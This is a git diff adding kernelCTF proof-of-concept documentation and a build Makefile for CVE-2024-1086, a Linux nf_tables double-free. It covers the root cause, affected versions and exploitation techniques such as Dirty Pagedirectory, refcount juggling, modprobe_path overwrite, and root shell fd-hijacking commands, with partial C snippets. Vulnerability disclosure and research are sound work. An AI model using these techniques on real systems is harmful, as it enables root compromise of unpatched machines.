google · koczkatamas · Sep 12, 2024 · Apr 3, 2024 · Apr 4, 2024 · Apr 4, 2024
diff --git a/pocs/linux/kernelctf/CVE-2024-1086_lts_mitigation/docs/exploit.md b/pocs/linux/kernelctf/CVE-2024-1086_lts_mitigation/docs/exploit.md
diff --git a/pocs/linux/kernelctf/CVE-2024-1086_lts_mitigation/docs/img/pagesetup.svg b/pocs/linux/kernelctf/CVE-2024-1086_lts_mitigation/docs/img/pagesetup.svg
diff --git a/pocs/linux/kernelctf/CVE-2024-1086_lts_mitigation/docs/novel-techniques.md b/pocs/linux/kernelctf/CVE-2024-1086_lts_mitigation/docs/novel-techniques.md
@@ -0,0 +1,199 @@
+# novel-techniques
+
+TODO: increase description granularity for techniques proven to be novel.
+
+## Bypassing KernelCTF mitigation instance corruption checks for skb's
+
+One of the mitigations in the KernelCTF Mitigation instance is checking the freelist next pointer when allocating an object through a freelist pointer. 
+
+In the exploit, the following happens when doing the double-free:
+1. alloc skb1
+2. free skb1 (set new freelist pointer)
+3. modify skb->len (overlapping with freelist next pointer)
+4. free skb1 (set new freelist pointer)
+
+This means upon step 3 the freelist next pointer gets corrupted. `CONFIG_FREELIST_HARDENED` is excluded here for demonstration purposes. When the background applications in the system try to transmit packets, they will inevitably try to allocate the skb object with the corrupted freelist next pointer, causing a system crash.
+
+To bypass this, we leverage the fact that these corruption checks only happen on allocation, not on free. Hence, we can mask the corrupted object by spraying "healthy" objects which can be allocated instead. Hence, it would look like this:
+
+1. alloc N skb objects
+2. alloc skb1
+3. free skb1 (set new freelist pointer)
+4. modify skb->len (overlapping with freelist next pointer)
+5. free N skb objects
+6. free skb1 (set new freelist pointer)
+
+Whilst this is probably not the vulnerability which freelist next pointer corruption detection is intended to mitigate, it would definitively mitigate exploiting this specific scenario.
+
+The fix for this technique would be checking the freelist next pointer of the previous object in the freelist when freeing an object.
+
+
+## Dirty Pagedirectory (pagetable confusion)
+
+Perhaps the most interesting technique in this exploit is Dirty Pagedirectory: plainly put, pagetable confusion between pagetables like PUD+PMD and PMD+PTE.
+
+By double-allocating an PUD page and PMD page, or an PMD page and a PTE page, which can set pagetable entries from userland pages. This allows for a *very* powerful primitive allowing the exploit to do rapid memory read/writes across all physical memory of the system. 
+
+Note how PT entries not only include the physical address (PFN), but also the page flags. Hence, we can write to read-only pages like modprobe_path. As if that isn't enough, we can set the target area to 1GiB (PMD+PTE) and/or 512GiB (PUD+PMD) addresses at the same time. Ofcourse, this can be limited to save memory usage and overhead. 
+
+
+## Freeing skb's instantly on arbitrary CPUs without UDP/TCP stacks
+
+In order to bypass certain double-free detections, we need to free skb's on specific timings on specific CPUs. Additionally, we cannot make use of the UDP and TCP stacks in the kernel, since they access (due to double-free) corrupted fields in the skb.
+
+Fortunately, we can do this with the IPv4 fragment queues (IFQs). By sending an IPv4 fragment to localhost, we make it wait `ipfrag_time` seconds until all fragments are freed. Alternatively, it gets freed when the IFQ is completed (i.e. the target length is reached with the fragments in the IFQ).
+
+If needed, we can prolong the lifetime of the IFQ by writing to `/proc/sys/net/ipv4/ipfrag_time`. 
+
+Unfortunately, the target length of the IFQ is depending on skb->len, which is corrupted by the double-free. Hence, we need to do this by triggering an error in the IFQ code, causing it to free all fragments in the queue on the CPU handling the triggering skb.
+
+It looks like this in action with the double-free:
+1. alloc skb1 (double-freed IPv4 fragment) @ CPU `X`
+2. free skb1 (1) @ CPU `X`
+3. make skb1 go into IFQ (utilizing its' content)
+4. do stuff here, like spraying skb's, spraying PTEs, etc
+5. alloc skb2 (errornous IPv4 fragment) @ CPU `Y`
+6. free skb2 @ CPU `Y`
+7. free skb1 @ CPU `Y`
+
+## Fileless privesc using fd hijacking
+
+We can escape the namespace by doing file descriptor hijacking: hooking up the file descriptors of another process (or `/dev/console`) to the `/bin/sh` instance as root triggered by the `modprobe_path` technique.
+
+For example:
+- hijack `/dev/console` (works only on local TTYs): `/bin/sh 0</dev/console 1>/dev/console 2>&1`
+- hijack exploit fd's (works on reverse shells as well): `/bin/sh 0</proc/<exploit_pid>/fd/0 1>/proc/<exploit_pid>/fd/1 2>&1`
+
+This way we can do fileless privesc and escape the namespace without even writing a single file, allowing for privesc on read-only systems.
+
+## Fileless privesc using modprobe_path + procfs
+
+We can combine overwriting `modprobe_path` with procfs to allow for fileless privesc script execution as root from the root namespace. With this primitive, we can utilize fd hijacking to perform fileless namespace escapes.
+
+We can overwrite `modprobe_path` to `/proc/<exploit_pid>/fd/<privesc_script_fd>` and it will execute the privesc script completely from memory, allowing privesc on read-only systems.
+
+## TLB flushing with PCID enabled
+
+One of the things required for Dirty Pagedirectory is a working TLB flushing primitive. Assuming the target VMA is shared, we can fork() and munmap() that VMA in the child. This allows for 100% working TLB flushing regardless of PCID, without altering the original pagetables. I presume the CPU needs to be pinned, to avoid flushing an incorrect CPU core's TLB cache.
+
+The code for this looks like:
+
+```c
+#define SPINLOCK(cmp) while (cmp) { usleep(10 * 1000); }
+
+// presumably needs to be CPU pinned
+static void flush_tlb(void *addr, size_t len)
+{
+	short *status;
+
+	status = mmap(NULL, sizeof(short), PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0);
+
+	*status = FLUSH_STAT_INPROGRESS;
+	if (fork() == 0)
+	{
+		munmap(addr, len);
+		*status = FLUSH_STAT_DONE;
+		sleep(9999);
+	}
+
+	SPINLOCK(*status == FLUSH_STAT_INPROGRESS);
+
+	munmap(status, sizeof(short));
+}
+```
+
+Note that the child sleeps instead of exits, to avoid certain kernel bugs when doing dirty pagedirectory.
+
+## Easing physical KASLR bruteforce
+
+It is possible to ease physical KASLR bruteforcing. The Linux kernel base is aligned to `CONFIG_PHYSICAL_START` (and/or `CONFIG_PHYSICAL_ALIGN`) bytes. This essentially means the Linux kernel must be aligned to 16MiB or 2MiB, reducing the amount of possible base addresses from e.g. 8GiB addresses (assuming 8GiB physical memory) to 512 addresses (a bruteforcable amount).
+
+## Validating the correct modprobe_path
+
+We can validate if we found the correct `modprobe_path` object in physical memory (when using Dirty Pagedirectory), by checking if the output of `/proc/sys/kernel/modprobe` has changed to the new value, since it is a "real-time" reference to the `modprobe_path` object used in the kernel. 
+
+For example, this can be done with:
+
+```c
+static int get_modprobe_path(char *buf, size_t buflen)
+{
+	int size;
+
+	size = read_file("/proc/sys/kernel/modprobe", buf, buflen);
+
+	if (size == buflen)
+		printf("[*] ==== read max amount of modprobe_path bytes, perhaps increment KMOD_PATH_LEN? ====\n");
+
+	// remove \x0a
+	buf[size-1] = '\x00';
+
+	return size;
+}
+
+static int strcmp_modprobe_path(char *new_str)
+{
+	char buf[KMOD_PATH_LEN] = { '\x00' };
+
+	get_modprobe_path(buf, KMOD_PATH_LEN);
+
+	return strncmp(new_str, buf, KMOD_PATH_LEN);
+}
+
+void *memmem_modprobe_path(void *haystack_virt, size_t haystack_len, char *modprobe_path_str, size_t modprobe_path_len)
+{
+	void *pmd_modprobe_addr;
+
+	// search 0x200000 bytes (a full PTE at a time) for the modprobe_path signature
+	pmd_modprobe_addr = memmem(haystack_virt, haystack_len, modprobe_path_str, modprobe_path_len);
+	if (pmd_modprobe_addr == NULL)
+		return NULL;
+
+	// check if this is the actual modprobe by overwriting it, and checking /proc/sys/kernel/modprobe
+	strcpy(pmd_modprobe_addr, "/sanitycheck");
+	if (strcmp_modprobe_path("/sanitycheck") != 0)
+	{
+		printf("[-] ^false positive. skipping to next one\n");
+		return NULL;
+	}
+
+	return pmd_modprobe_addr;
+}
+```
+
+## Page refcount juggling
+
+When freeing a page, the Linux kernel checks if the pages' refcount is 0. If it is not, it will refuse to free the page. To bypass this behaviour we simply juggle the refcounts, by utilizing the following order of operations for the double-free:
+
+1. alloc obj1  | refcount 0 -> 1
+2. free obj1  | refcount 1 -> 0
+3. alloc obj2  | refcount 0 -> 1
+4. free obj1  | refcount 1 -> 0
+5. alloc obj3  | refcount 0 -> 1
+
+obj2 and obj3 will now be overlapping (having the same page), because the refcounts were always 0 when freeing.
+
+```c
+void __free_pages(struct page *page, unsigned int order)
+{
+	/* get PageHead before we drop reference */
+	int head = PageHead(page);
+
+	if (put_page_testzero(page))
+		free_the_page(page, order);
+	else if (!head)
+		while (order-- > 0)
+			free_the_page(page + (1 << order), order);
+}
+```
+
+## Double-free order 4 to order 0 (old: race condition)
+
+When double-freeing pages, we can convert the page order to 0 utilizing a race condition with a `WARN()` message on really slow systems (like QEMU VMs with synchronous terminals). In the new exploit, this has been replaced with PCP draining as this works on all systems.
+
+This allows us to double-allocate `order==0` pages whilst having a double-free primitive on `order==4` pages.
+
+## Double-free order X to order Y (new: PCP refill)
+
+When double-freeing pages, we can convert the page order to an arbitrary order by double-freeing pages with `order>=4` such that it will end up in the buddy allocator freelist. Then, we can allocate it to the PCP list of an arbitrary `order<=3` page freelist, by draining said PCP-freelist and refilling it with the pages from the buddy-freelist.
+
+This is the new variant of the race condition-based method.
diff --git a/pocs/linux/kernelctf/CVE-2024-1086_lts_mitigation/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2024-1086_lts_mitigation/docs/vulnerability.md
@@ -0,0 +1,47 @@
+# vulnerability
+
+Document containing information about the vulnerability, the requirements, and the affected Linux kernel versions.
+
+## technical details
+
+### outlines
+
+The root cause is an input sanitization bug in `nft_verdict_init()` (`net/netfilter/nf_tables_api.c:9814`), which allowed rule verdicts to return positive drop errors. This is classified as CVE-2024-1086.
+
+The impact of this is a stable double-free primitive on both `struct sk_buff` objects, as well as `sk_buff->head` objects (kmalloc objects, ranging from size 256 to 65536 (assuming ipv4) a.k.a. order 4 buddy pages).
+
+The fix for the vulnerability was simply disallowing all drop errors in `nft_verdict_init()`, as this wouldn't allow userland applications to provide any drop errors anymore. It did not make sense to the kernel developers that userland applications could do this anyways, so hence they fully disabled it.
+
+### triggering the bug
+
+An exploit can create a rule containing an expression which sets the verdict to `0xFFFF0000`. 
+
+When this rule gets evaluated for an skb passing the nf_tables firewall, `nf_hook_slow()` attempts to free an skb object because `NF_DROP` is returned from the verdict mask of the rule verdict (`0xFFFF0000 (verdict) & 0x000000ff (NF_VERDICT_MASK) == 0 (NF_DROP)`). Then, `nf_hook_slow()` returns `NF_ACCEPT` (`NF_DROP_GETERR(0xFFFF0000) == NF_ACCEPT`) as if every hook/rule in the chain returned `NF_ACCEPT`. 
+
+This causes the caller of `nf_hook_slow()` to misinterpret the situation (it believes the packet has not been freed, and should be handled), and continue parsing the packet and eventually double-free both the skb object and its skb->head object.
+
+## requirements
+
+Capabilities:
+- `CAP_NET_ADMIN`
+
+Kernel configuration:
+- `CONFIG_NF_TABLES=y`
+- `CONFIG_NETFILTER=y`
+
+User namespaces needed:
+- Yes, in order to setup rules for nf_tables to trigger the bug (`CAP_NET_ADMIN` in the current namespace should also be enough)
+
+## version info
+
+Commit which introduced the vuln: 
+- https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=e0abdadcc6e113ed2e22c85b35007
+
+Commit which fixed the vuln (revert of previous commit): 
+- https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=f342de4e2f33e0e39165d8639387aa6c19dff660
+
+Affected kernel versions: 
+- everything between `v3.5` and `v6.8-rc1`
+- excluding `v6.1.76` and higher on `v6.1.x`
+- excluding `v6.6.15` and higher on `v6.6.x`
+- excluding `v6.7.3` and higher on `v6.7.x`
diff --git a/pocs/linux/kernelctf/CVE-2024-1086_lts_mitigation/exploit/lts-6.1.72/Makefile b/pocs/linux/kernelctf/CVE-2024-1086_lts_mitigation/exploit/lts-6.1.72/Makefile
@@ -0,0 +1,34 @@
+SRC_FILES := src/exploit.c src/env.c src/net.c src/nftnl.c src/file.c
+OUT_NAME = ./exploit
+
+# use musl-gcc since statically linking glibc with gcc generated invalid opcodes for qemu
+#   and dynamically linking raised glibc ABI versioning errors
+CC = musl-gcc
+
+# use custom headers with fixed versions in a musl-gcc compatible manner
+# - ./include/libmnl: libmnl v1.0.5
+# - ./include/libnftnl: libnftnl v1.2.6
+# - ./include/linux-lts-6.1.72: linux v6.1.72
+CFLAGS = -I./include -I./include/linux-lts-6.1.72 -Wall -Wno-deprecated-declarations
+
+# use custom object archives compiled with musl-gcc for compatibility. normal ones 
+#   are used with gcc and have _chk funcs which musl doesn't support
+# the versions are the same as the headers above
+LIBMNL_PATH = ./lib/libmnl.a
+LIBNFTNL_PATH = ./lib/libnftnl.a
+
+exploit: _compile_static _strip_bin
+prerequisites: _install_musl
+run: _run_outfile
+clean: _clean_outfile
+
+_install_musl:
+	sudo apt-get install musl-tools
+_compile_static:
+	$(CC) $(CFLAGS) $(SRC_FILES) -o $(OUT_NAME) -static $(LIBNFTNL_PATH) $(LIBMNL_PATH)
+_strip_bin:
+	strip $(OUT_NAME)
+_run_outfile:
+	$(OUT_NAME)
+_clean_outfile:
+	rm $(OUT_NAME)
diff --git a/pocs/linux/kernelctf/CVE-2024-1086_lts_mitigation/exploit/lts-6.1.72/exploit b/pocs/linux/kernelctf/CVE-2024-1086_lts_mitigation/exploit/lts-6.1.72/exploit